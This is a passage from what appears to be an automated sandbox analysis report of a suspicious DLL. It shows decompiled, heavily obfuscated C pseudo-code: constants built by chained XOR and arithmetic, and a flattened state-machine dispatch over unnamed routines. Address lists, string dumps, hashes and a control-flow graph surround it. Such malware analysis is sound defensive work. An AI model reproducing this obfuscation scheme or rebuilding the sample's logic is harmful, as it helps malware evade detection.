                          						__eflags = _t1259;
                          						if(_t1259 == 0) {
                          							_t1259 = E00D3C6B8();
                          						}
                          						goto L64;
                          					}
                          					__eflags = _t1469 - 0x75265a3;
                          				} while (_t1469 != 0x75265a3);
                          				goto L113;
                          			}

                          0x00d39973
                          0x00d3997b
                          0x00d39986
                          0x00d3998e
                          0x00d39996
                          0x00d399a1
                          0x00d399ac
                          0x00d399b7
                          0x00d399bf
                          0x00d399cc
                          0x00d399dc
                          0x00d399e7
                          0x00d399f2
                          0x00d399fd
                          0x00d39a05
                          0x00d39a10
                          0x00d39a24
                          0x00d39a29
                          0x00d39a30
                          0x00d39a37
                          0x00d39a42
                          0x00d39a4d
                          0x00d39a55
                          0x00d39a5d
                          0x00d39a65
                          0x00d39a6a
                          0x00d39a72
                          0x00d39a7d
                          0x00d39a88
                          0x00d39a93
                          0x00d39aa7
                          0x00d39aac
                          0x00d39ab3
                          0x00d39ac3
                          0x00d39aca
                          0x00d39aca
                          0x00d39ad5
                          0x00d39ad5
                          0x00d39ad5
                          0x00d39ad5
                          0x00d39adb
                          0x00d39adb
                          0x00d39ae1
                          0x00d39ae1
                          0x00d3a3f3
                          0x00d3a406
                          0x00d3a40d
                          0x00d3a40d
                          0x00d39ae7
                          0x00d39aed
                          0x00d39d2c
                          0x00d39d32
                          0x00d39e70
                          0x00d39e76
                          0x00d39f12
                          0x00d39f17
                          0x00d39ad5
                          0x00d39ad5
                          0x00d39ad5
                          0x00d39adb
                          0x00d39adb
                          0x00000000
                          0x00d39adb
                          0x00000000
                          0x00d39ad5
                          0x00d39e7c
                          0x00d39e82
                          0x00d39efc
                          0x00d39f01
                          0x00000000
                          0x00d39f01
                          0x00d39e84
                          0x00d39e8a
                          0x00d39ed0
                          0x00d39edc
                          0x00d39ee5
                          0x00d39eed
                          0x00000000
                          0x00d39eed
                          0x00d39e8c
                          0x00d39e92
                          0x00000000
                          0x00000000
                          0x00d39ea6
                          0x00d39eaf
                          0x00d39eb7
                          0x00000000
                          0x00d39eb7
                          0x00d39d38
                          0x00d39e5a
                          0x00d39e63
                          0x00d39e65
                          0x00d39c17
                          0x00d39c17
                          0x00000000
                          0x00d39c17
                          0x00d39d3e
                          0x00d39d44
                          0x00d39e3c
                          0x00d39e41
                          0x00d39e43
                          0x00000000
                          0x00000000
                          0x00d39e49
                          0x00000000
                          0x00d39e49
                          0x00d39d4a
                          0x00d39d50
                          0x00d39e0f
                          0x00d39e14
                          0x00d39e1b
                          0x00d39e23
                          0x00000000
                          0x00d39e23
                          0x00d39d52
                          0x00d39d58
                          0x00d39db7
                          0x00d39dbe
                          0x00d39dc3
                          0x00000000
                          0x00d39dc3
                          0x00d39d5a
                          0x00d39d60
                          0x00000000
                          0x00000000
                          0x00d39d82
                          0x00d39d9e
                          0x00d39da3
                          0x00d39da6
                          0x00d39dad
                          0x00000000
                          0x00d39dad
                          0x00d39af3
                          0x00d39d15
                          0x00d39d1a
                          0x00d39d1c
                          0x00000000
                          0x00000000
                          0x00d39d22
                          0x00000000
                          0x00d39d22
                          0x00d39af9
                          0x00d39aff
                          0x00d39c82
                          0x00d39c88
                          0x00d3a3dc
                          0x00000000
                          0x00d3a3e2
                          0x00d39c8e
                          0x00d39c94
                          0x00d39cf8
                          0x00d39cfd
                          0x00000000
                          0x00d39cfd
                          0x00d39c96
                          0x00d39c9c
                          0x00d39cdb
                          0x00d39ce0
                          0x00d39ce7
                          0x00000000
                          0x00d39ce7
                          0x00d39c9e
                          0x00d39ca4
                          0x00000000
                          0x00000000
                          0x00d39cc3
                          0x00d39cca
                          0x00d39cca
                          0x00000000
                          0x00d39cca
                          0x00d39b05
                          0x00d39c63
                          0x00d39c68
                          0x00d39c6f
                          0x00d39c77
                          0x00000000
                          0x00d39c77
                          0x00d39b11
                          0x00d39bf6
                          0x00d39bfb
                          0x00d39bfd
                          0x00d39c26
                          0x00d39c2f
                          0x00d39c37
                          0x00000000
                          0x00d39c37
                          0x00d39c06
                          0x00d39c0f
                          0x00d39c11
                          0x00d39c11
                          0x00000000
                          0x00d39c11
                          0x00d39b1d
                          0x00d39bd1
                          0x00d39bd6
                          0x00d39bd8
                          0x00000000
                          0x00000000
                          0x00d39bde
                          0x00000000
                          0x00d39bde
                          0x00d39b29
                          0x00d39b61
                          0x00d39b68
                          0x00d39bbc
                          0x00d39bbc
                          0x00000000
                          0x00d39bbc
                          0x00d39b95
                          0x00d39b9a
                          0x00d39b9d
                          0x00d39ba4
                          0x00d39bb7
                          0x00000000
                          0x00d39ba6
                          0x00d39ba6
                          0x00000000
                          0x00d39ba6
                          0x00d39ba4
                          0x00d39b31
                          0x00000000
                          0x00d39b37
                          0x00d39b50
                          0x00d39b57
                          0x00000000
                          0x00d39b57
                          0x00d39f21
                          0x00d39f21
                          0x00d39f27
                          0x00d3a137
                          0x00d3a13d
                          0x00d3a284
                          0x00d3a28a
                          0x00d3a3af
                          0x00d3a3b4
                          0x00000000
                          0x00d3a3b4
                          0x00d3a290
                          0x00d3a296
                          0x00d3a399
                          0x00d3a39e
                          0x00000000
                          0x00d3a39e
                          0x00d3a29c
                          0x00d3a2a2
                          0x00d3a2db
                          0x00d3a2fd
                          0x00d3a319
                          0x00d3a325
                          0x00d3a33b
                          0x00d3a356
                          0x00d3a381
                          0x00d3a386
                          0x00d3a386
                          0x00000000
                          0x00d3a2a2
                          0x00d3a143
                          0x00d3a27a
                          0x00000000
                          0x00d3a27a
                          0x00d3a149
                          0x00d3a14f
                          0x00d3a1dd
                          0x00d3a1e2
                          0x00d3a1e7
                          0x00d3a1ea
                          0x00d3a1ec
                          0x00d3a1f4
                          0x00d3a1fb
                          0x00d3a1fd
                          0x00d3a218
                          0x00d3a219
                          0x00d3a22a
                          0x00d3a22c
                          0x00d3a22f
                          0x00d3a22f
                          0x00d3a236
                          0x00d3a239
                          0x00d3a254
                          0x00d3a255
                          0x00d3a264
                          0x00d3a269
                          0x00d3a26c
                          0x00d3a26c
                          0x00d3a1ee
                          0x00d3a1ee
                          0x00d3a1ee
                          0x00d3a26e
                          0x00d3a270
                          0x00000000
                          0x00d3a270
                          0x00d3a151
                          0x00d3a153
                          0x00d3a1b4
                          0x00d3a1b9
                          0x00d3a1ba
                          0x00000000
                          0x00d3a1ba
                          0x00d3a155
                          0x00d3a15b
                          0x00d3a18c
                          0x00d3a191
                          0x00d3a198
                          0x00000000
                          0x00d3a198
                          0x00d3a15d
                          0x00d3a163
                          0x00000000
                          0x00000000
                          0x00d3a169
                          0x00d3a170
                          0x00d3a172
                          0x00000000
                          0x00d3a172
                          0x00d39f2d
                          0x00d3a121
                          0x00d3a126
                          0x00d3a12d
                          0x00000000
                          0x00d3a12d
                          0x00d39f33
                          0x00d39f39
                          0x00d39fd2
                          0x00d39fd8
                          0x00d3a106
                          0x00d3a10b
                          0x00d3a10d
                          0x00000000
                          0x00000000
                          0x00d3a113
                          0x00000000
                          0x00d3a113
                          0x00d39fde
                          0x00d39fe4
                          0x00d3a0e4
                          0x00d3a0e9
                          0x00d3a0eb
                          0x00000000
                          0x00000000
                          0x00d3a0f1
                          0x00000000
                          0x00d3a0f1
                          0x00d39fea
                          0x00d39ff0
                          0x00d3a066
                          0x00d3a06d
                          0x00d3a072
                          0x00d3a075
                          0x00d3a077
                          0x00d3a0b0
                          0x00d3a0b7
                          0x00d3a0ba
                          0x00d3a0c6
                          0x00d3a0c8
                          0x00d3a0d3
                          0x00d3a0d3
                          0x00000000
                          0x00d3a0d3
                          0x00d3a0ca
                          0x00d3a0cd
                          0x00d39f85
                          0x00d39f85
                          0x00000000
                          0x00d39f85
                          0x00000000
                          0x00d3a0cd
                          0x00d3a0bc
                          0x00000000
                          0x00d3a0bc
                          0x00d3a08f
                          0x00d3a090
                          0x00d3a09f
                          0x00d3a0a4
                          0x00d3a0a7
                          0x00d3a0a9
                          0x00000000
                          0x00d3a0a9
                          0x00d39ff2
                          0x00d39ff8
                          0x00000000
                          0x00000000
                          0x00d3a00c
                          0x00d3a015
                          0x00d3a029
                          0x00d3a02a
                          0x00d3a039
                          0x00d3a03e
                          0x00d3a041
                          0x00000000
                          0x00d3a041
                          0x00d39f3f
                          0x00d39fc3
                          0x00d39fc8
                          0x00000000
                          0x00d39fc8
                          0x00d39f41
                          0x00d39f47
                          0x00d3a401
                          0x00000000
                          0x00d3a401
                          0x00d39f4d
                          0x00d39f53
                          0x00d39fb0
                          0x00d39fb5
                          0x00000000
                          0x00d39fb5
                          0x00d39f55
                          0x00d39f5b
                          0x00d39f9a
                          0x00d39f9f
                          0x00000000
                          0x00d39f9f
                          0x00d39f5d
                          0x00d39f63
                          0x00000000
                          0x00000000
                          0x00d39f70
                          0x00d39f75
                          0x00d39f77
                          0x00d39f80
                          0x00d39f80
                          0x00000000
                          0x00d39f77
                          0x00d3a3b9
                          0x00d3a3b9
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
                          • API String ID: 0-3734606162
                          • Opcode ID: 9c6624dd709bd92848be769937ed7cb0265e4ed64f035bd256e01409eb9ee83f
                          • Instruction ID: 70ecb7f5e1432b5c522f94d56328a0514b2dcc4aec5d5cde11473ab7107998e2
                          • Opcode Fuzzy Hash: 9c6624dd709bd92848be769937ed7cb0265e4ed64f035bd256e01409eb9ee83f
                          • Instruction Fuzzy Hash: B9E20F719093818BD3B8CF25C58AADBFBE1BB85314F10891DE5DE96260DBB08949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 263 d3a871-d3b3ee call d51f6d 266 d3b3f0-d3b3f6 263->266 267 d3b679-d3b67f 266->267 268 d3b3fc 266->268 271 d3b685-d3b68b 267->271 272 d3b7ba-d3b7de call d50a64 267->272 269 d3b652-d3b674 call d52b09 268->269 270 d3b402-d3b408 268->270 269->266 276 d3b5b7-d3b64d call d4e1f8 call d544ad call d4fecb 270->276 277 d3b40e-d3b414 270->277 273 d3b691-d3b697 271->273 274 d3b780-d3b7b5 call d4d8db 271->274 290 d3b7e0-d3b7e5 272->290 291 d3b7ea 272->291 279 d3b73d-d3b77b call d31a34 273->279 280 d3b69d-d3b6a3 273->280 274->266 276->266 283 d3b57a-d3b5b2 call d485ff 277->283 284 d3b41a-d3b420 277->284 279->266 287 d3b6a9-d3b72d call d40cf9 call d400c5 call d3f726 280->287 288 d3b7ef-d3b7f5 280->288 283->266 294 d3b422-d3b428 284->294 295 d3b45f-d3b56a call d50db1 call d409dd call d3baa9 call d4e1f8 call d52d0a call d4fecb call d3bfbe 284->295 307 d3b815-d3b81f 287->307 325 d3b733-d3b738 287->325 288->266 300 d3b7fb 288->300 290->266 291->288 303 d3b42e-d3b434 294->303 304 d3b7fd-d3b814 call d51538 294->304 295->307 333 d3b570-d3b575 295->333 300->307 303->288 310 d3b43a-d3b45d call d52b09 303->310 304->307 310->266 325->266 333->266
                          C-Code - Quality: 95%
                          			E00D3A871(void* __ecx) {
                          				char _v524;
                          				char _v1044;
                          				char _v1564;
                          				char _v2084;
                          				char _v2604;
                          				signed int _v2608;
                          				signed int _v2612;
                          				intOrPtr _v2616;
                          				intOrPtr _v2620;
                          				intOrPtr _v2624;
                          				char _v2628;
                          				intOrPtr _v2632;
                          				char _v2636;
                          				signed int _v2640;
                          				signed int _v2644;
                          				signed int _v2648;
                          				signed int _v2652;
                          				signed int _v2656;
                          				signed int _v2660;
                          				signed int _v2664;
                          				signed int _v2668;
                          				signed int _v2672;
                          				signed int _v2676;
                          				signed int _v2680;
                          				signed int _v2684;
                          				signed int _v2688;
                          				signed int _v2692;
                          				signed int _v2696;
                          				signed int _v2700;
                          				signed int _v2704;
                          				signed int _v2708;
                          				signed int _v2712;
                          				signed int _v2716;
                          				signed int _v2720;
                          				signed int _v2724;
                          				signed int _v2728;
                          				signed int _v2732;
                          				signed int _v2736;
                          				signed int _v2740;
                          				signed int _v2744;
                          				signed int _v2748;
                          				signed int _v2752;
                          				signed int _v2756;
                          				signed int _v2760;
                          				unsigned int _v2764;
                          				signed int _v2768;
                          				signed int _v2772;
                          				signed int _v2776;
                          				signed int _v2780;
                          				signed int _v2784;
                          				signed int _v2788;
                          				signed int _v2792;
                          				signed int _v2796;
                          				signed int _v2800;
                          				signed int _v2804;
                          				signed int _v2808;
                          				signed int _v2812;
                          				signed int _v2816;
                          				signed int _v2820;
                          				signed int _v2824;
                          				signed int _v2828;
                          				signed int _v2832;
                          				signed int _v2836;
                          				signed int _v2840;
                          				signed int _v2844;
                          				signed int _v2848;
                          				signed int _v2852;
                          				signed int _v2856;
                          				signed int _v2860;
                          				signed int _v2864;
                          				signed int _v2868;
                          				signed int _v2872;
                          				signed int _v2876;
                          				signed int _v2880;
                          				signed int _v2884;
                          				signed int _v2888;
                          				signed int _v2892;
                          				signed int _v2896;
                          				signed int _v2900;
                          				signed int _v2904;
                          				signed int _v2908;
                          				signed int _v2912;
                          				signed int _v2916;
                          				signed int _v2920;
                          				signed int _v2924;
                          				signed int _v2928;
                          				signed int _v2932;
                          				void* _t731;
                          				signed int _t732;
                          				signed int _t733;
                          				signed int _t743;
                          				signed int _t758;
                          				void* _t761;
                          				signed int _t763;
                          				signed int _t764;
                          				signed int _t765;
                          				signed int _t766;
                          				signed int _t767;
                          				signed int _t768;
                          				signed int _t769;
                          				signed int _t770;
                          				signed int _t771;
                          				signed int _t772;
                          				signed int _t773;
                          				signed int _t774;
                          				signed int _t775;
                          				signed int _t776;
                          				signed int _t777;
                          				signed int _t778;
                          				signed int _t779;
                          				signed int _t780;
                          				signed int _t783;
                          				void* _t804;
                          				void* _t861;
                          				signed int _t865;
                          				void* _t867;
                          				signed int* _t868;
                          				void* _t874;
                          
                          				_t868 =  &_v2932;
                          				_v2612 = _v2612 & 0x00000000;
                          				_v2608 = _v2608 & 0x00000000;
                          				_v2616 = 0x74b642;
                          				_v2776 = 0xf885ca;
                          				_v2776 = _v2776 | 0xffdfd4be;
                          				_v2776 = _v2776 ^ 0xffffd5d7;
                          				_v2704 = 0xd88538;
                          				_v2704 = _v2704 + 0xebcf;
                          				_v2704 = _v2704 ^ 0x00c97107;
                          				_v2800 = 0xd52646;
                          				_v2800 = _v2800 ^ 0xe8dc52fe;
                          				_v2800 = _v2800 + 0xffffe935;
                          				_v2800 = _v2800 ^ 0xe804d8f6;
                          				_v2688 = 0xbafe67;
                          				_v2688 = _v2688 + 0x9481;
                          				_v2688 = _v2688 ^ 0x00b13019;
                          				_v2884 = 0x3d12e1;
                          				_v2884 = _v2884 << 1;
                          				_v2884 = _v2884 * 0x55;
                          				_t867 = __ecx;
                          				_t861 = 0xbf2cce3;
                          				_t763 = 0x73;
                          				_v2884 = _v2884 * 0xf;
                          				_v2884 = _v2884 ^ 0x605e8f7b;
                          				_v2696 = 0xf649d9;
                          				_v2696 = _v2696 / _t763;
                          				_v2696 = _v2696 ^ 0x000dd9df;
                          				_v2764 = 0x4a6242;
                          				_v2764 = _v2764 + 0xffff45cb;
                          				_v2764 = _v2764 >> 0xc;
                          				_v2764 = _v2764 ^ 0x000572e2;
                          				_v2784 = 0x8333a2;
                          				_t764 = 0x2e;
                          				_v2784 = _v2784 / _t764;
                          				_v2784 = _v2784 + 0xffffe135;
                          				_v2784 = _v2784 ^ 0x0005b928;
                          				_v2852 = 0xf9a739;
                          				_v2852 = _v2852 | 0x42d1f5c6;
                          				_v2852 = _v2852 + 0xfffff01c;
                          				_v2852 = _v2852 ^ 0x42f87d02;
                          				_v2896 = 0x31e192;
                          				_v2896 = _v2896 << 0xa;
                          				_v2896 = _v2896 << 0xa;
                          				_t765 = 0xb;
                          				_v2896 = _v2896 * 0x26;
                          				_v2896 = _v2896 ^ 0xbac011ee;
                          				_v2928 = 0xcde58e;
                          				_v2928 = _v2928 | 0x2bdbfaea;
                          				_v2928 = _v2928 << 8;
                          				_v2928 = _v2928 | 0x4ddc4764;
                          				_v2928 = _v2928 ^ 0xdffb1335;
                          				_v2740 = 0xd63953;
                          				_v2740 = _v2740 + 0x5c5c;
                          				_v2740 = _v2740 ^ 0x00d7db1f;
                          				_v2844 = 0x6db889;
                          				_v2844 = _v2844 + 0x1eed;
                          				_v2844 = _v2844 / _t765;
                          				_v2844 = _v2844 ^ 0x0002c3cf;
                          				_v2796 = 0x98820d;
                          				_v2796 = _v2796 | 0x8cff8acf;
                          				_t766 = 0x43;
                          				_v2796 = _v2796 / _t766;
                          				_v2796 = _v2796 ^ 0x021946ce;
                          				_v2668 = 0x18627d;
                          				_t767 = 7;
                          				_v2668 = _v2668 / _t767;
                          				_v2668 = _v2668 ^ 0x00044156;
                          				_v2772 = 0x2c7378;
                          				_v2772 = _v2772 >> 0xb;
                          				_v2772 = _v2772 >> 6;
                          				_v2772 = _v2772 ^ 0x000b6d9a;
                          				_v2880 = 0xd4c7fd;
                          				_t768 = 0x7b;
                          				_v2880 = _v2880 / _t768;
                          				_v2880 = _v2880 + 0xffffaacc;
                          				_t769 = 0x22;
                          				_v2880 = _v2880 * 0x2f;
                          				_v2880 = _v2880 ^ 0x00480dcd;
                          				_v2920 = 0xe4d6f8;
                          				_v2920 = _v2920 * 0x42;
                          				_v2920 = _v2920 + 0xa0b6;
                          				_v2920 = _v2920 << 8;
                          				_v2920 = _v2920 ^ 0x000574ec;
                          				_v2640 = 0xd6ae6b;
                          				_v2640 = _v2640 | 0xbe6f316b;
                          				_v2640 = _v2640 ^ 0xbefadf9c;
                          				_v2836 = 0x6fb4;
                          				_v2836 = _v2836 + 0xffffc368;
                          				_v2836 = _v2836 >> 0x10;
                          				_v2836 = _v2836 ^ 0x0009680a;
                          				_v2724 = 0x8b61bc;
                          				_v2724 = _v2724 * 0x75;
                          				_v2724 = _v2724 ^ 0x3fbdc7d4;
                          				_v2912 = 0x753704;
                          				_v2912 = _v2912 >> 0xb;
                          				_v2912 = _v2912 + 0xd457;
                          				_v2912 = _v2912 << 1;
                          				_v2912 = _v2912 ^ 0x000d652f;
                          				_v2716 = 0xde59a0;
                          				_v2716 = _v2716 + 0xffff5778;
                          				_v2716 = _v2716 ^ 0x00d8a7a4;
                          				_v2752 = 0x428dcf;
                          				_v2752 = _v2752 / _t769;
                          				_v2752 = _v2752 | 0x08d5d60c;
                          				_v2752 = _v2752 ^ 0x08d7d48c;
                          				_v2828 = 0xe83a42;
                          				_v2828 = _v2828 ^ 0x1f3eb5e2;
                          				_v2828 = _v2828 * 0x7e;
                          				_v2828 = _v2828 ^ 0xab9e63e1;
                          				_v2788 = 0x69d445;
                          				_v2788 = _v2788 | 0x87a4a8ed;
                          				_v2788 = _v2788 ^ 0x9a4d3e24;
                          				_v2788 = _v2788 ^ 0x1da0be74;
                          				_v2888 = 0x7663d0;
                          				_v2888 = _v2888 | 0x8f53a1f3;
                          				_v2888 = _v2888 >> 0xf;
                          				_v2888 = _v2888 * 0xa;
                          				_v2888 = _v2888 ^ 0x000d5ba1;
                          				_v2644 = 0x20e74e;
                          				_v2644 = _v2644 | 0x742f98e9;
                          				_v2644 = _v2644 ^ 0x74210d1b;
                          				_v2904 = 0xfccdb4;
                          				_t770 = 0xd;
                          				_v2904 = _v2904 * 0x7c;
                          				_v2904 = _v2904 >> 0xd;
                          				_v2904 = _v2904 | 0x17cf49de;
                          				_v2904 = _v2904 ^ 0x17c7aae5;
                          				_v2708 = 0xc1d2f2;
                          				_v2708 = _v2708 + 0xffff5a94;
                          				_v2708 = _v2708 ^ 0x00cb5d75;
                          				_v2660 = 0x58d6fe;
                          				_v2660 = _v2660 + 0x639e;
                          				_v2660 = _v2660 ^ 0x00518056;
                          				_v2652 = 0x6bd84b;
                          				_v2652 = _v2652 + 0xb95a;
                          				_v2652 = _v2652 ^ 0x00624667;
                          				_v2700 = 0xf92c4f;
                          				_v2700 = _v2700 * 0x75;
                          				_v2700 = _v2700 ^ 0x71e1c3ce;
                          				_v2892 = 0xd4714c;
                          				_v2892 = _v2892 + 0xffffadfa;
                          				_v2892 = _v2892 + 0xd7d2;
                          				_v2892 = _v2892 << 2;
                          				_v2892 = _v2892 ^ 0x0358083c;
                          				_v2900 = 0xca6485;
                          				_v2900 = _v2900 ^ 0x66674751;
                          				_v2900 = _v2900 | 0x9fb8fe7f;
                          				_v2900 = _v2900 ^ 0xffb729be;
                          				_v2824 = 0x9c46e2;
                          				_v2824 = _v2824 / _t770;
                          				_t771 = 0x6e;
                          				_v2824 = _v2824 * 7;
                          				_v2824 = _v2824 ^ 0x005409ff;
                          				_v2832 = 0x773d17;
                          				_v2832 = _v2832 >> 0xe;
                          				_v2832 = _v2832 + 0x6313;
                          				_v2832 = _v2832 ^ 0x000d17fa;
                          				_v2792 = 0x3014cc;
                          				_v2792 = _v2792 + 0xffff152c;
                          				_v2792 = _v2792 + 0xffff3bdf;
                          				_v2792 = _v2792 ^ 0x002eea21;
                          				_v2864 = 0x76e575;
                          				_v2864 = _v2864 | 0xb1b1a986;
                          				_v2864 = _v2864 * 0x79;
                          				_v2864 = _v2864 ^ 0x1e28dcc7;
                          				_v2712 = 0xf7e6ad;
                          				_v2712 = _v2712 * 0xb;
                          				_v2712 = _v2712 ^ 0x0aae7ee0;
                          				_v2808 = 0xd4cb39;
                          				_v2808 = _v2808 * 0x50;
                          				_v2808 = _v2808 * 0x75;
                          				_v2808 = _v2808 ^ 0x6440f87f;
                          				_v2720 = 0x360163;
                          				_v2720 = _v2720 + 0xffffc3fc;
                          				_v2720 = _v2720 ^ 0x0035ed30;
                          				_v2816 = 0xf63972;
                          				_v2816 = _v2816 / _t771;
                          				_v2816 = _v2816 + 0xffff69c4;
                          				_v2816 = _v2816 ^ 0x0001f3af;
                          				_v2728 = 0x218a6d;
                          				_v2728 = _v2728 | 0x0e9fd07f;
                          				_v2728 = _v2728 ^ 0x0eb1edc0;
                          				_v2756 = 0x58a84f;
                          				_v2756 = _v2756 * 0x22;
                          				_t772 = 0x3d;
                          				_v2756 = _v2756 / _t772;
                          				_v2756 = _v2756 ^ 0x0033367e;
                          				_v2680 = 0x526d89;
                          				_v2680 = _v2680 << 3;
                          				_v2680 = _v2680 ^ 0x02908fe9;
                          				_v2876 = 0xb95aa0;
                          				_t773 = 0x6f;
                          				_v2876 = _v2876 / _t773;
                          				_v2876 = _v2876 + 0x7ba5;
                          				_v2876 = _v2876 | 0x4bff3dbe;
                          				_v2876 = _v2876 ^ 0x4bf5695e;
                          				_v2748 = 0x470f02;
                          				_t774 = 0x6a;
                          				_v2748 = _v2748 / _t774;
                          				_v2748 = _v2748 ^ 0x394a4d48;
                          				_v2748 = _v2748 ^ 0x39498008;
                          				_v2684 = 0xb8f542;
                          				_v2684 = _v2684 * 0x66;
                          				_v2684 = _v2684 ^ 0x49b10479;
                          				_v2812 = 0x4a6932;
                          				_v2812 = _v2812 >> 7;
                          				_v2812 = _v2812 ^ 0xe4afcb01;
                          				_v2812 = _v2812 ^ 0xe4ae05c3;
                          				_v2932 = 0xa851a7;
                          				_v2932 = _v2932 * 0x2b;
                          				_v2932 = _v2932 ^ 0x9481cb07;
                          				_v2932 = _v2932 >> 6;
                          				_v2932 = _v2932 ^ 0x02246e93;
                          				_v2872 = 0x6bc7af;
                          				_v2872 = _v2872 ^ 0x3226b467;
                          				_v2872 = _v2872 * 0x1e;
                          				_v2872 = _v2872 << 0xb;
                          				_v2872 = _v2872 ^ 0x9c8deb19;
                          				_v2860 = 0x8556fb;
                          				_v2860 = _v2860 | 0x69e02514;
                          				_v2860 = _v2860 + 0xedcb;
                          				_v2860 = _v2860 ^ 0x69e8258b;
                          				_v2676 = 0xb187db;
                          				_v2676 = _v2676 << 0xb;
                          				_v2676 = _v2676 ^ 0x8c3acae2;
                          				_v2656 = 0xd34daf;
                          				_v2656 = _v2656 >> 0xe;
                          				_v2656 = _v2656 ^ 0x0009be95;
                          				_v2804 = 0x3574a6;
                          				_v2804 = _v2804 >> 9;
                          				_v2804 = _v2804 * 0x2a;
                          				_v2804 = _v2804 ^ 0x00009063;
                          				_v2760 = 0x8f0143;
                          				_v2760 = _v2760 * 0x43;
                          				_v2760 = _v2760 >> 3;
                          				_v2760 = _v2760 ^ 0x04abe301;
                          				_v2924 = 0x8fc82d;
                          				_v2924 = _v2924 << 1;
                          				_v2924 = _v2924 | 0xafdefbbe;
                          				_v2924 = _v2924 ^ 0xafdce921;
                          				_v2840 = 0x98b351;
                          				_v2840 = _v2840 << 0xe;
                          				_v2840 = _v2840 + 0x39e2;
                          				_v2840 = _v2840 ^ 0x2cd1b69a;
                          				_v2648 = 0xefee4b;
                          				_v2648 = _v2648 + 0xffff46f9;
                          				_v2648 = _v2648 ^ 0x00ec21a4;
                          				_v2848 = 0xd96457;
                          				_v2848 = _v2848 * 0x6c;
                          				_v2848 = _v2848 ^ 0xa04c0af4;
                          				_v2848 = _v2848 ^ 0xfbfff8f9;
                          				_v2856 = 0xd54255;
                          				_t775 = 0x29;
                          				_v2856 = _v2856 / _t775;
                          				_v2856 = _v2856 + 0x5db9;
                          				_v2856 = _v2856 ^ 0x00024640;
                          				_v2780 = 0x684df0;
                          				_v2780 = _v2780 ^ 0x2cfc36b9;
                          				_v2780 = _v2780 + 0xffffad37;
                          				_v2780 = _v2780 ^ 0x2c920bcc;
                          				_v2664 = 0x93e9a1;
                          				_v2664 = _v2664 ^ 0xb0758ee6;
                          				_v2664 = _v2664 ^ 0xb0e547c8;
                          				_v2692 = 0xe0a4a1;
                          				_v2692 = _v2692 << 0x10;
                          				_v2692 = _v2692 ^ 0xa4a3a3bd;
                          				_v2820 = 0x53ca07;
                          				_t776 = 0x38;
                          				_v2820 = _v2820 / _t776;
                          				_v2820 = _v2820 ^ 0x69a52d4a;
                          				_v2820 = _v2820 ^ 0x69a742e5;
                          				_v2768 = 0x45adf5;
                          				_t777 = 0x28;
                          				_v2768 = _v2768 / _t777;
                          				_t778 = 0x33;
                          				_v2768 = _v2768 * 0x6f;
                          				_v2768 = _v2768 ^ 0x00c7348a;
                          				_v2672 = 0xa3622d;
                          				_v2672 = _v2672 * 0x68;
                          				_v2672 = _v2672 ^ 0x42518aaf;
                          				_v2732 = 0xe7d257;
                          				_v2732 = _v2732 << 0xc;
                          				_v2732 = _v2732 ^ 0x7d2b6ce8;
                          				_v2908 = 0xb6fcc8;
                          				_v2908 = _v2908 / _t778;
                          				_t779 = 0x63;
                          				_v2908 = _v2908 * 0x4f;
                          				_v2908 = _v2908 / _t779;
                          				_v2908 = _v2908 ^ 0x0008aa55;
                          				_v2736 = 0xa2e201;
                          				_t780 = 0x24;
                          				_v2736 = _v2736 / _t780;
                          				_v2736 = _v2736 ^ 0x0004c10d;
                          				_v2916 = 0xc480dc;
                          				_v2916 = _v2916 + 0xffff6830;
                          				_v2916 = _v2916 << 0xc;
                          				_v2916 = _v2916 >> 3;
                          				_v2916 = _v2916 ^ 0x07d4cd30;
                          				_v2744 = 0x29dac5;
                          				_v2744 = _v2744 + 0xffff883e;
                          				_v2744 = _v2744 ^ 0x002f91a3;
                          				_v2868 = 0xe49a6a;
                          				_v2868 = _v2868 + 0xb047;
                          				_v2868 = _v2868 ^ 0x5e8c4957;
                          				_v2868 = _v2868 * 0x36;
                          				_v2868 = _v2868 ^ 0xea21adfb;
                          				_t731 = E00D51F6D(_t780);
                          				_t860 = _v2744;
                          				_t761 = _t731;
                          				goto L1;
                          				do {
                          					while(1) {
                          						L1:
                          						_t874 = _t861 - 0x6dbb171;
                          						if(_t874 > 0) {
                          							break;
                          						}
                          						if(_t874 == 0) {
                          							E00D52B09(_v2908, _v2636, _v2736, _v2916);
                          							_pop(_t783);
                          							_t861 = 0x240e9e1;
                          							continue;
                          						} else {
                          							if(_t861 == 0xb8f10d) {
                          								_push(_v2872);
                          								_push(_v2932);
                          								_push(_v2812);
                          								_t865 = E00D4E1F8(0xd319bc, _v2684, __eflags);
                          								E00D544AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
                          								_t783 = _t865;
                          								E00D4FECB(_t783, _v2840, _v2648, _v2848, _v2856);
                          								_t868 =  &(_t868[0xf]);
                          								_t861 = 0x1618198;
                          								continue;
                          							} else {
                          								if(_t861 == 0x1618198) {
                          									_push(_t783);
                          									_t783 = _v2780;
                          									_t743 = E00D485FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
                          									_t868 =  &(_t868[7]);
                          									_t861 = 0x2876e66;
                          									continue;
                          								} else {
                          									if(_t861 == 0x1d2207b) {
                          										E00D50DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
                          										 *((short*)(E00D409DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
                          										E00D3BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
                          										_push(_v2912);
                          										_push(_v2724);
                          										_push(_v2836);
                          										E00D52D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0xd3188c,  &_v2604,  &_v2084, E00D4E1F8(0xd3188c, _v2640, __eflags));
                          										E00D4FECB(_t748, _v2644, _v2904, _v2708, _v2660);
                          										_t868 =  &(_t868[0x16]);
